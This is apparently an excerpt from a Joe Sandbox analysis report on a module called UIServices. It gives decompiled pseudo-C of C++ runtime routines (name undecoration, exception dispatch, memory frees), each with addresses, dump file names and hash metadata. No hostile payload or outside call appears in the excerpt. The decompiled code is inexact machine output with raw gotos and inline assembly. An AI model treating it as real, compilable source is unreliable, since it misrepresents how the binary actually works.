                                                    				char* _t58;
                                                    				long long _t60;
                                                    
                                                    				_a8 = __rbx;
                                                    				_t47 =  *0x23c74360; // 0x0
                                                    				_t55 = __rcx;
                                                    				_v56 = __rcx;
                                                    				_v48 = 0;
                                                    				if ( *_t47 == 0) goto 0x23c6a02f;
                                                    				_t25 =  *_t47;
                                                    				if (_t25 - 0x30 < 0) goto 0x23c6a023;
                                                    				if (_t25 - 0x31 <= 0) goto 0x23c69f97;
                                                    				if (_t25 - 0x33 <= 0) goto 0x23c69f88;
                                                    				if (_t25 == 0x34) goto 0x23c69fad;
                                                    				if (_t25 == 0x35) goto 0x23c69f79;
                                                    				if (_t25 - 0x36 - 1 > 0) goto 0x23c6a023;
                                                    				goto 0x23c69f9e;
                                                    				r8d = 4;
                                                    				goto 0x23c69fa4;
                                                    				r8d = 6;
                                                    				goto 0x23c69fa4;
                                                    				r8d = 5;
                                                    				_t58 =  &_v56;
                                                    				E00007FFC7FFC23C66B04(_t47, __rcx, _t58, "char ", __rdi, __rsi);
                                                    				_t48 =  *0x23c74360; // 0x0
                                                    				_t34 =  *_t48;
                                                    				 *0x23c74360 =  *0x23c74360 + 1;
                                                    				if ((_t58 - 0x00000031 & 0x000000f9) != 0) goto 0x23c69fc9;
                                                    				if (_t34 != 0x37) goto 0x23c69fce;
                                                    				if (_t34 != 0x37) goto 0x23c6a014;
                                                    				_v32 = 9;
                                                    				_t49 = "unsigned ";
                                                    				_v40 = _t49;
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23C66CF4(_t49,  &_v24,  &_v40);
                                                    				_t60 = _t49;
                                                    				E00007FFC7FFC23C66F74(_t60,  &_v40,  &_v56);
                                                    				_v56 = _v40;
                                                    				_v48 = _v32;
                                                    				 *_t55 = _v56;
                                                    				_t32 = _v48;
                                                    				 *((intOrPtr*)(_t55 + 8)) = _t32;
                                                    				goto 0x23c6a03c;
                                                    				 *((intOrPtr*)(_t55 + 8)) = _t34;
                                                    				 *((char*)(_t55 + 8)) = 2;
                                                    				 *_t55 = _t60;
                                                    				goto 0x23c6a03c;
                                                    				 *((intOrPtr*)(_t55 + 8)) = _t34;
                                                    				 *_t55 = 0x23c71ac0;
                                                    				return _t32;
                                                    			}

















                                                    0x7ffc23c69f24
                                                    0x7ffc23c69f31
                                                    0x7ffc23c69f38
                                                    0x7ffc23c69f3d
                                                    0x7ffc23c69f41
                                                    0x7ffc23c69f46
                                                    0x7ffc23c69f4c
                                                    0x7ffc23c69f50
                                                    0x7ffc23c69f58
                                                    0x7ffc23c69f5c
                                                    0x7ffc23c69f60
                                                    0x7ffc23c69f64
                                                    0x7ffc23c69f6a
                                                    0x7ffc23c69f77
                                                    0x7ffc23c69f79
                                                    0x7ffc23c69f86
                                                    0x7ffc23c69f88
                                                    0x7ffc23c69f95
                                                    0x7ffc23c69f9e
                                                    0x7ffc23c69fa4
                                                    0x7ffc23c69fa8
                                                    0x7ffc23c69fad
                                                    0x7ffc23c69fb4
                                                    0x7ffc23c69fb6
                                                    0x7ffc23c69fc2
                                                    0x7ffc23c69fc7
                                                    0x7ffc23c69fcc
                                                    0x7ffc23c69fce
                                                    0x7ffc23c69fd5
                                                    0x7ffc23c69fdc
                                                    0x7ffc23c69fe4
                                                    0x7ffc23c69fec
                                                    0x7ffc23c69ff1
                                                    0x7ffc23c69ffa
                                                    0x7ffc23c6a001
                                                    0x7ffc23c6a00a
                                                    0x7ffc23c6a011
                                                    0x7ffc23c6a018
                                                    0x7ffc23c6a01b
                                                    0x7ffc23c6a01e
                                                    0x7ffc23c6a021
                                                    0x7ffc23c6a023
                                                    0x7ffc23c6a026
                                                    0x7ffc23c6a02a
                                                    0x7ffc23c6a02d
                                                    0x7ffc23c6a036
                                                    0x7ffc23c6a039
                                                    0x7ffc23c6a049

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: char $int $long $short $unsigned
                                                    • API String ID: 2943138195-3894466517
                                                    • Opcode ID: bb3df1c13bcd3c05a540f85c8de59aa84bc71187771de2afaadad0cec2c16253
                                                    • Instruction ID: 6005acaae2ce8ba50e8f8f5cc7f4a36552ac660ac065d21bdf3fea24359a04da
                                                    • Opcode Fuzzy Hash: bb3df1c13bcd3c05a540f85c8de59aa84bc71187771de2afaadad0cec2c16253
                                                    • Instruction Fuzzy Hash: EB318B76F18B6A88EB148B6CEC402BC37B8EB88744F844275DA4D66759DF28A541CB21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 16%
                                                    			E00007FFC7FFC23C66070(long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi) {
                                                    				void* _t28;
                                                    				void* _t54;
                                                    				long long _t61;
                                                    				void* _t64;
                                                    				void* _t69;
                                                    				void* _t71;
                                                    				void* _t74;
                                                    				int _t77;
                                                    				void* _t80;
                                                    
                                                    				_t69 = _t64;
                                                    				 *((long long*)(_t69 + 8)) = __rbx;
                                                    				 *((long long*)(_t69 + 0x10)) = _t61;
                                                    				 *((long long*)(_t69 + 0x18)) = __rsi;
                                                    				if ( *__rcx != 0) goto 0x23c6616d;
                                                    				 *((short*)(_t64 - 0x40 + 0x28)) = 0x2800;
                                                    				r8d = 0;
                                                    				 *((long long*)(_t69 - 0x48)) = 0x7ffc23c65fc0;
                                                    				E00007FFC7FFC23C6DF30(_t80);
                                                    				if (0x7ffc23c65fc0 == 0) goto 0x23c66161;
                                                    				if ( *((intOrPtr*)(0x7ffc23c65fc0)) != sil) goto 0x23c660da;
                                                    				if (0 == 0) goto 0x23c66100;
                                                    				_t28 =  *((char*)(0x7ffc23c65fbf)) - 0x20;
                                                    				if (_t28 != 0) goto 0x23c66100;
                                                    				 *((intOrPtr*)(0x7ffc23c65fbf)) = sil;
                                                    				if (_t28 != 0) goto 0x23c660ef;
                                                    				malloc(_t77);
                                                    				if (0xffffffffffffffff == 0) goto 0x23c66158;
                                                    				asm("xorps xmm0, xmm0");
                                                    				asm("movaps [esp+0x30], xmm0");
                                                    				asm("movdqa [eax], xmm0");
                                                    				__imp__strcpy_s(_t54);
                                                    				asm("lock dec ebp");
                                                    				if (0 == 0) goto 0x23c66146;
                                                    				goto 0x23c66158;
                                                    				__imp__InterlockedPushEntrySList();
                                                    				free(_t74);
                                                    				free(_t71);
                                                    				return 0;
                                                    			}












                                                    0x7ffc23c66070
                                                    0x7ffc23c66073
                                                    0x7ffc23c66077
                                                    0x7ffc23c6607b
                                                    0x7ffc23c6609a
                                                    0x7ffc23c660a9
                                                    0x7ffc23c660bc
                                                    0x7ffc23c660c1
                                                    0x7ffc23c660c5
                                                    0x7ffc23c660d0
                                                    0x7ffc23c660e1
                                                    0x7ffc23c660e6
                                                    0x7ffc23c660ef
                                                    0x7ffc23c660f2
                                                    0x7ffc23c660f4
                                                    0x7ffc23c660fe
                                                    0x7ffc23c66108
                                                    0x7ffc23c66114
                                                    0x7ffc23c66116
                                                    0x7ffc23c66120
                                                    0x7ffc23c66128
                                                    0x7ffc23c66132
                                                    0x7ffc23c6613a
                                                    0x7ffc23c6613f
                                                    0x7ffc23c66144
                                                    0x7ffc23c6614f
                                                    0x7ffc23c6615b
                                                    0x7ffc23c66164
                                                    0x7ffc23c6618a

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                    • String ID:
                                                    • API String ID: 3741236498-0
                                                    • Opcode ID: 0f2d48bb16129a0a8e53847f6d1a3a85f1b8f07e82e9465fd64f3ead8f082cbd
                                                    • Instruction ID: d4a57d63e366aaab84443c0ee8722689933f1208145cd259965db5d7f4fbfce1
                                                    • Opcode Fuzzy Hash: 0f2d48bb16129a0a8e53847f6d1a3a85f1b8f07e82e9465fd64f3ead8f082cbd
                                                    • Instruction Fuzzy Hash: 2231E422B15B7991EA019F2AAC084696394FF48FE4F544371DE2D13381DF3ED452C360
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 61%
                                                    			E00007FFC7FFC23C63648(void* __edx, intOrPtr* __rcx, void* __rdx, long long __r8, void* __r9) {
                                                    				void* __rbx;
                                                    				void* __rdi;
                                                    				void* __rsi;
                                                    				void* _t94;
                                                    				intOrPtr _t95;
                                                    				intOrPtr _t125;
                                                    				void* _t136;
                                                    				intOrPtr _t137;
                                                    				signed long long _t143;
                                                    				long long _t145;
                                                    				long long _t150;
                                                    				void* _t151;
                                                    				intOrPtr* _t171;
                                                    				long long _t182;
                                                    				long long _t183;
                                                    				intOrPtr* _t184;
                                                    				void* _t185;
                                                    				intOrPtr* _t186;
                                                    				intOrPtr* _t187;
                                                    				void* _t188;
                                                    				signed long long _t189;
                                                    				intOrPtr _t197;
                                                    				void* _t204;
                                                    				long long _t205;
                                                    
                                                    				_t187 = _t188 - 0x38;
                                                    				_t189 = _t188 - 0x138;
                                                    				_t143 =  *0x23c74038; // 0x577607bbd382
                                                    				 *(_t187 + 0x28) = _t143 ^ _t189;
                                                    				_t185 = __r9;
                                                    				_t145 =  *((intOrPtr*)(_t187 + 0xb8));
                                                    				_t204 = __rdx;
                                                    				_t205 =  *((intOrPtr*)(_t187 + 0xa0));
                                                    				_t186 = __rcx;
                                                    				 *((long long*)(_t189 + 0x70)) = _t145;
                                                    				 *((long long*)(_t189 + 0x78)) = __r8;
                                                    				if ( *__rcx == 0x80000003) goto 0x23c63911;
                                                    				E00007FFC7FFC23C664B0(_t145);
                                                    				r12d =  *((intOrPtr*)(_t187 + 0xb0));
                                                    				r15d =  *((intOrPtr*)(_t187 + 0xa8));
                                                    				if ( *((long long*)(_t145 + 0x10)) == 0) goto 0x23c63710;
                                                    				__imp__EncodePointer();
                                                    				_t160 = _t145;
                                                    				E00007FFC7FFC23C664B0(_t145);
                                                    				if ( *((intOrPtr*)(_t145 + 0x10)) == _t145) goto 0x23c63710;
                                                    				if ( *__rcx == 0xe0434f4d) goto 0x23c63710;
                                                    				if ( *__rcx == 0xe0434352) goto 0x23c63710;
                                                    				 *((intOrPtr*)(_t189 + 0x38)) = r15d;
                                                    				 *(_t189 + 0x30) =  *((intOrPtr*)(_t189 + 0x70));
                                                    				 *((intOrPtr*)(_t189 + 0x28)) = r12d;
                                                    				 *((long long*)(_t189 + 0x20)) = _t205;
                                                    				if (E00007FFC7FFC23C6E5A0(__rcx, __rdx,  *((intOrPtr*)(_t189 + 0x78)), __r9) != 0) goto 0x23c63911;
                                                    				E00007FFC7FFC23C640EC(_t187, _t205,  *((intOrPtr*)(__r9 + 8)));
                                                    				if ( *_t187 <= 0) goto 0x23c63931;
                                                    				 *((intOrPtr*)(_t189 + 0x28)) = r12d;
                                                    				 *((long long*)(_t189 + 0x20)) = _t205;
                                                    				r8d = r15d;
                                                    				_t94 = E00007FFC7FFC23C6EA68(_t145, _t187 - 0x70, _t187, _t185, __rcx);
                                                    				asm("movups xmm0, [ebp-0x70]");
                                                    				asm("movdqu [ebp-0x80], xmm0");
                                                    				asm("psrldq xmm0, 0x8");
                                                    				asm("movd eax, xmm0");
                                                    				if (_t94 -  *((intOrPtr*)(_t187 - 0x58)) >= 0) goto 0x23c63911;
                                                    				_t95 =  *((intOrPtr*)(_t187 - 0x78));
                                                    				 *((long long*)(_t189 + 0x68)) =  *((intOrPtr*)(_t187 - 0x70));
                                                    				 *((intOrPtr*)(_t189 + 0x60)) = _t95;
                                                    				asm("inc ecx");
                                                    				asm("dec ax");
                                                    				asm("movups [ebp-0x80], xmm0");
                                                    				if (_t95 - r15d > 0) goto 0x23c63877;
                                                    				_t136 = r15d - _t95;
                                                    				if (_t136 > 0) goto 0x23c63877;
                                                    				r9d =  *((intOrPtr*)( *((intOrPtr*)(_t185 + 0x10))));
                                                    				E00007FFC7FFC23C64070( *((intOrPtr*)(_t185 + 0x10)), _t187 - 0x50, _t187 - 0x80,  *((intOrPtr*)(_t185 + 8)));
                                                    				 *((long long*)(_t187 - 0x48)) =  *((intOrPtr*)(_t187 - 0x40));
                                                    				E00007FFC7FFC23C64700( *((intOrPtr*)(_t187 - 0x40)), _t187 - 0x50);
                                                    				_t150 =  *((intOrPtr*)(_t187 - 0x40));
                                                    				 *((long long*)(_t187 - 0x48)) = _t150;
                                                    				E00007FFC7FFC23C64700(_t150, _t187 - 0x50);
                                                    				if (_t136 == 0) goto 0x23c637ee;
                                                    				E00007FFC7FFC23C64700(_t150, _t187 - 0x50);
                                                    				if (_t136 != 0) goto 0x23c637df;
                                                    				_t137 =  *((intOrPtr*)(_t187 - 0x30));
                                                    				if (_t137 == 0) goto 0x23c6381c;
                                                    				E00007FFC7FFC23C6F044(_t150);
                                                    				_t151 = _t150 +  *((intOrPtr*)(_t187 - 0x30));
                                                    				if (_t137 == 0) goto 0x23c6381c;
                                                    				if (__edx == 0) goto 0x23c63814;
                                                    				E00007FFC7FFC23C6F044(_t151);
                                                    				goto 0x23c63816;
                                                    				if ( *((char*)(_t151 +  *((intOrPtr*)(_t187 - 0x30)) + 0x10)) != 0) goto 0x23c6386b;
                                                    				if (( *(_t187 - 0x34) & 0x00000040) != 0) goto 0x23c6386b;
                                                    				 *((char*)(_t189 + 0x58)) = 0;
                                                    				_t171 = _t186;
                                                    				 *((char*)(_t189 + 0x50)) = 1;
                                                    				 *((long long*)(_t189 + 0x48)) =  *((intOrPtr*)(_t189 + 0x70));
                                                    				 *((intOrPtr*)(_t189 + 0x40)) = r12d;
                                                    				 *((long long*)(_t189 + 0x38)) = _t187 - 0x80;
                                                    				 *(_t189 + 0x30) =  *(_t189 + 0x30) & 0x00000000;
                                                    				 *((long long*)(_t189 + 0x28)) = _t187 - 0x38;
                                                    				 *((long long*)(_t189 + 0x20)) = _t205;
                                                    				E00007FFC7FFC23C62970(0, _t160 - 1, _t171, _t204,  *((intOrPtr*)(_t189 + 0x78)), _t185);
                                                    				_t197 =  *((intOrPtr*)(_t189 + 0x68));
                                                    				_t182 =  *((intOrPtr*)(_t197 + 8)) -  *((char*)(_t171 + 0x7ffc23c70410));
                                                    				 *((long long*)(_t197 + 8)) = _t182;
                                                    				 *(_t197 + 0x18) =  *(_t182 - 4) >>  *(_t171 + 0x7ffc23c70420);
                                                    				_t183 = _t182 -  *((char*)(_t171 + 0x7ffc23c70410));
                                                    				 *((long long*)(_t197 + 8)) = _t183;
                                                    				 *(_t197 + 0x1c) =  *(_t183 - 4) >>  *(_t171 + 0x7ffc23c70420);
                                                    				_t184 = _t183 -  *((char*)(_t171 + 0x7ffc23c70410));
                                                    				 *(_t197 + 0x20) =  *(_t184 - 4) >>  *(_t171 + 0x7ffc23c70420);
                                                    				 *((long long*)(_t197 + 8)) = _t184;
                                                    				 *((intOrPtr*)(_t197 + 0x24)) =  *_t184;
                                                    				_t125 =  *((intOrPtr*)(_t189 + 0x60)) + 1;
                                                    				 *((long long*)(_t197 + 8)) = _t184 + 4;
                                                    				 *((intOrPtr*)(_t189 + 0x60)) = _t125;
                                                    				if (_t125 -  *((intOrPtr*)(_t187 - 0x58)) < 0) goto 0x23c63779;
                                                    				return E00007FFC7FFC23C6F5B0(_t125, _t184 + 4,  *(_t187 + 0x28) ^ _t189, _t184);
                                                    			}



























                                                    0x7ffc23c63655
                                                    0x7ffc23c6365a
                                                    0x7ffc23c63661
                                                    0x7ffc23c6366b
                                                    0x7ffc23c63675
                                                    0x7ffc23c63678
                                                    0x7ffc23c6367f
                                                    0x7ffc23c63682
                                                    0x7ffc23c63689
                                                    0x7ffc23c6368c
                                                    0x7ffc23c63691
                                                    0x7ffc23c63696
                                                    0x7ffc23c6369c
                                                    0x7ffc23c636a1
                                                    0x7ffc23c636a8
                                                    0x7ffc23c636b4
                                                    0x7ffc23c636b8
                                                    0x7ffc23c636be
                                                    0x7ffc23c636c1
                                                    0x7ffc23c636ca
                                                    0x7ffc23c636d2
                                                    0x7ffc23c636da
                                                    0x7ffc23c636ec
                                                    0x7ffc23c636f4
                                                    0x7ffc23c636f9
                                                    0x7ffc23c636fe
                                                    0x7ffc23c6370a
                                                    0x7ffc23c6371b
                                                    0x7ffc23c63724
                                                    0x7ffc23c6372a
                                                    0x7ffc23c63736
                                                    0x7ffc23c6373b
                                                    0x7ffc23c63742
                                                    0x7ffc23c63747
                                                    0x7ffc23c6374b
                                                    0x7ffc23c63750
                                                    0x7ffc23c63755
                                                    0x7ffc23c6375c
                                                    0x7ffc23c6376d
                                                    0x7ffc23c63770
                                                    0x7ffc23c63775
                                                    0x7ffc23c63779
                                                    0x7ffc23c6377e
                                                    0x7ffc23c63783
                                                    0x7ffc23c6378a
                                                    0x7ffc23c63794
                                                    0x7ffc23c63797
                                                    0x7ffc23c637ad
                                                    0x7ffc23c637b0
                                                    0x7ffc23c637bd
                                                    0x7ffc23c637c1
                                                    0x7ffc23c637c6
                                                    0x7ffc23c637d1
                                                    0x7ffc23c637d5
                                                    0x7ffc23c637dd
                                                    0x7ffc23c637e3
                                                    0x7ffc23c637ec
                                                    0x7ffc23c637ee
                                                    0x7ffc23c637f2
                                                    0x7ffc23c637f4
                                                    0x7ffc23c637fd
                                                    0x7ffc23c63800
                                                    0x7ffc23c63804
                                                    0x7ffc23c63806
                                                    0x7ffc23c63812
                                                    0x7ffc23c6381a
                                                    0x7ffc23c63820
                                                    0x7ffc23c63832
                                                    0x7ffc23c63837
                                                    0x7ffc23c6383a
                                                    0x7ffc23c6383f
                                                    0x7ffc23c63848
                                                    0x7ffc23c6384d
                                                    0x7ffc23c63856
                                                    0x7ffc23c6385c
                                                    0x7ffc23c63861
                                                    0x7ffc23c63866
                                                    0x7ffc23c6386b
                                                    0x7ffc23c63892
                                                    0x7ffc23c6389a
                                                    0x7ffc23c6389e
                                                    0x7ffc23c638b9
                                                    0x7ffc23c638c1
                                                    0x7ffc23c638c5
                                                    0x7ffc23c638e0
                                                    0x7ffc23c638e8
                                                    0x7ffc23c638f0
                                                    0x7ffc23c638f6
                                                    0x7ffc23c638fe
                                                    0x7ffc23c63900
                                                    0x7ffc23c63904
                                                    0x7ffc23c6390b
                                                    0x7ffc23c63930

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abort$CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2889003569-2084237596
                                                    • Opcode ID: 5d15f68c4dd8f56a710f480657a434a9006b6843fccaef8df8c10feb4636c5e6
                                                    • Instruction ID: 6371a2547b4bf246e505f36ae339c3535bdaf4a712febf9214d3312d174df592
                                                    • Opcode Fuzzy Hash: 5d15f68c4dd8f56a710f480657a434a9006b6843fccaef8df8c10feb4636c5e6
                                                    • Instruction Fuzzy Hash: E0918173B08BA58AE710CB69E8802AD7BB0F745788F144276EE8D27765DF38D195CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 61%
                                                    			E00007FFC7FFC23C6B428(void* __edx, void* __edi, void* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rdi, void* __rsi, long long __r8, void* __r14, long long _a8, long long _a16) {
                                                    				intOrPtr _v16;
                                                    				char _v24;
                                                    				intOrPtr _v32;
                                                    				char _v40;
                                                    				intOrPtr _t21;
                                                    				char _t23;
                                                    				char _t28;
                                                    				void* _t33;
                                                    				void* _t38;
                                                    				char* _t46;
                                                    				long long _t50;
                                                    				char* _t52;
                                                    				intOrPtr* _t55;
                                                    				long long _t62;
                                                    
                                                    				_t62 = __r8;
                                                    				_t57 = __rsi;
                                                    				_t33 = __rax;
                                                    				_t27 = __edi;
                                                    				_t26 = __edx;
                                                    				_a8 = __rbx;
                                                    				_a16 = __rdi;
                                                    				r8d = 0;
                                                    				_t55 = __rdx;
                                                    				_t46 =  *0x23c74360; // 0x0
                                                    				_t38 = __rcx;
                                                    				_v40 = __r8;
                                                    				_v32 = r8d;
                                                    				_t23 =  *_t46;
                                                    				_t28 = _t23;
                                                    				if (_t28 == 0) goto 0x23c6b4ef;
                                                    				if (_t28 == 0) goto 0x23c6b4e0;
                                                    				if (_t28 == 0) goto 0x23c6b4ad;
                                                    				if (_t23 - 7 == 1) goto 0x23c6b47c;
                                                    				E00007FFC7FFC23C68898(__edx, __edi, __rcx, __rcx, __rdx, __rdx, __rsi, __r14);
                                                    				goto 0x23c6b50d;
                                                    				if ( *_t55 == _t62) goto 0x23c6b494;
                                                    				r8d = 9;
                                                    				goto 0x23c6b4a1;
                                                    				r8d = 8;
                                                    				E00007FFC7FFC23C66B04(_t33, _t38,  &_v40, "volatile", _t55, _t57);
                                                    				_t50 =  *0x23c74360; // 0x0
                                                    				r9d = 2;
                                                    				_v24 =  *_t55;
                                                    				asm("bts eax, 0x8");
                                                    				 *0x23c74360 = _t50 + 1;
                                                    				_t52 =  &_v40;
                                                    				_v16 =  *((intOrPtr*)(_t55 + 8));
                                                    				E00007FFC7FFC23C6B8A8(_t26, _t27, _t38, _t38, _t52, _t55, _t57,  &_v24);
                                                    				goto 0x23c6b50d;
                                                    				_t21 =  *((intOrPtr*)(_t52 + 1));
                                                    				if (_t21 == 0x24) goto 0x23c6b520;
                                                    				if (_t21 != 0) goto 0x23c6b61e;
                                                    				_v16 = r8d;
                                                    				_v24 = 0x23c71ac0;
                                                    				return E00007FFC7FFC23C66F74( &_v24, _t38, _t55);
                                                    			}

















                                                    0x7ffc23c6b428
                                                    0x7ffc23c6b428
                                                    0x7ffc23c6b428
                                                    0x7ffc23c6b428
                                                    0x7ffc23c6b428
                                                    0x7ffc23c6b428
                                                    0x7ffc23c6b42d
                                                    0x7ffc23c6b43a
                                                    0x7ffc23c6b43d
                                                    0x7ffc23c6b440
                                                    0x7ffc23c6b447
                                                    0x7ffc23c6b44a
                                                    0x7ffc23c6b44e
                                                    0x7ffc23c6b452
                                                    0x7ffc23c6b455
                                                    0x7ffc23c6b457
                                                    0x7ffc23c6b460
                                                    0x7ffc23c6b465
                                                    0x7ffc23c6b46a
                                                    0x7ffc23c6b472
                                                    0x7ffc23c6b477
                                                    0x7ffc23c6b483
                                                    0x7ffc23c6b485
                                                    0x7ffc23c6b492
                                                    0x7ffc23c6b494
                                                    0x7ffc23c6b4a1
                                                    0x7ffc23c6b4a6
                                                    0x7ffc23c6b4ad
                                                    0x7ffc23c6b4ba
                                                    0x7ffc23c6b4c7
                                                    0x7ffc23c6b4cb
                                                    0x7ffc23c6b4d2
                                                    0x7ffc23c6b4d6
                                                    0x7ffc23c6b4d9
                                                    0x7ffc23c6b4de
                                                    0x7ffc23c6b4e0
                                                    0x7ffc23c6b4e5
                                                    0x7ffc23c6b4e9
                                                    0x7ffc23c6b4f6
                                                    0x7ffc23c6b4fa
                                                    0x7ffc23c6b51f

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                    • API String ID: 2943138195-757766384
                                                    • Opcode ID: 75c4db024949df2d24ab21bd94cb90a7bdec3444905746c1734e11322e8c0ddb
                                                    • Instruction ID: 65ef81a805d7c5c48ba1151901dfa3d136bcd1090d8dd0b543fe966d5bf0fe06
                                                    • Opcode Fuzzy Hash: 75c4db024949df2d24ab21bd94cb90a7bdec3444905746c1734e11322e8c0ddb
                                                    • Instruction Fuzzy Hash: A0715C71B08A6A84EB149F2EEC550B867A9FB84780F8443B5DE4D66B94DF3CE150CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E00007FFC7FFC23C63430(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
                                                    				void* _t19;
                                                    				void* _t27;
                                                    				void* _t36;
                                                    				void* _t39;
                                                    				void* _t42;
                                                    				void* _t43;
                                                    				void* _t45;
                                                    				void* _t46;
                                                    				void* _t52;
                                                    				void* _t54;
                                                    				void* _t56;
                                                    				void* _t59;
                                                    
                                                    				_t27 = _t45;
                                                    				 *((long long*)(_t27 + 0x20)) = __rbx;
                                                    				 *((long long*)(_t27 + 0x18)) = __r8;
                                                    				 *((long long*)(_t27 + 0x10)) = __rdx;
                                                    				_t43 = _t27 - 0x3f;
                                                    				_t46 = _t45 - 0xc0;
                                                    				if ( *__rcx == 0x80000003) goto 0x23c634d4;
                                                    				E00007FFC7FFC23C664B0(_t27);
                                                    				r12d =  *((intOrPtr*)(_t43 + 0x6f));
                                                    				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x23c634ef;
                                                    				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
                                                    				E00007FFC7FFC23C664B0(_t27);
                                                    				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x23c634ef;
                                                    				if ( *__rcx == 0xe0434f4d) goto 0x23c634ef;
                                                    				r13d =  *((intOrPtr*)(_t43 + 0x77));
                                                    				if ( *__rcx == 0xe0434352) goto 0x23c634f3;
                                                    				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
                                                    				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
                                                    				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
                                                    				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
                                                    				_t19 = E00007FFC7FFC23C6E54C(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
                                                    				if (_t19 == 0) goto 0x23c634f3;
                                                    				return _t19;
                                                    			}















                                                    0x7ffc23c63430
                                                    0x7ffc23c63433
                                                    0x7ffc23c63437
                                                    0x7ffc23c6343b
                                                    0x7ffc23c6344a
                                                    0x7ffc23c6344e
                                                    0x7ffc23c63464
                                                    0x7ffc23c63466
                                                    0x7ffc23c6346b
                                                    0x7ffc23c63478
                                                    0x7ffc23c6347c
                                                    0x7ffc23c63485
                                                    0x7ffc23c6348e
                                                    0x7ffc23c63497
                                                    0x7ffc23c634a0
                                                    0x7ffc23c634a4
                                                    0x7ffc23c634b4
                                                    0x7ffc23c634bc
                                                    0x7ffc23c634c1
                                                    0x7ffc23c634c6
                                                    0x7ffc23c634cb
                                                    0x7ffc23c634d2
                                                    0x7ffc23c634ee

                                                    APIs
